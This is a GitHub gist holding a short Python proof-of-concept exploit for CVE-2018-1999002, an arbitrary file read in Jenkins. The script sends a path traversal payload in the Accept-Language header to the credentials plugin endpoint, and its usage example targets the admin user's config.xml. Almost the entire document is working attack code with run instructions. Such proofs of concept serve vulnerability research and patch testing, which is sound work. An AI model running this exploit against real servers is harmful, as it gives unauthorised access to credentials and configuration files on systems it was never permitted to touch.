Created
July 23, 2018 20:55
-
-
Save becojo/a2630cc63da1f522460d7951c115ca7c to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import os | |
| PLUGIN = 'credentials' | |
| BACKDIR_COUNT = 10 | |
| if len(sys.argv) != 3: | |
| print 'usage:\n\tpython CVE-2018-1999002.py [jenkins base url] [absolute file path]' | |
| print '' | |
| print 'exemple:\n\tpython CVE-2018-1999002.py http://localhost:8080/ "/Program Files (x86)/Jenkins/users/admin/config.xml"' | |
| sys.exit(1) | |
| base_url = sys.argv[1] | |
| file_path = sys.argv[2] | |
| if file_path[0] == '/': | |
| file_path = file_path[1:] | |
| file_name, file_ext = os.path.splitext(file_path) | |
| assert file_ext, "The file path must have an extension" | |
| headers = { 'Accept-Language': ('../' * BACKDIR_COUNT) + file_name } | |
| res = requests.get(os.path.join(base_url, 'plugin', PLUGIN, file_ext), headers=headers) | |
| if res.status_code == 200: | |
| print res.content | |
| else: | |
| print 'Failed with HTTP code %d' % res.status_code |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment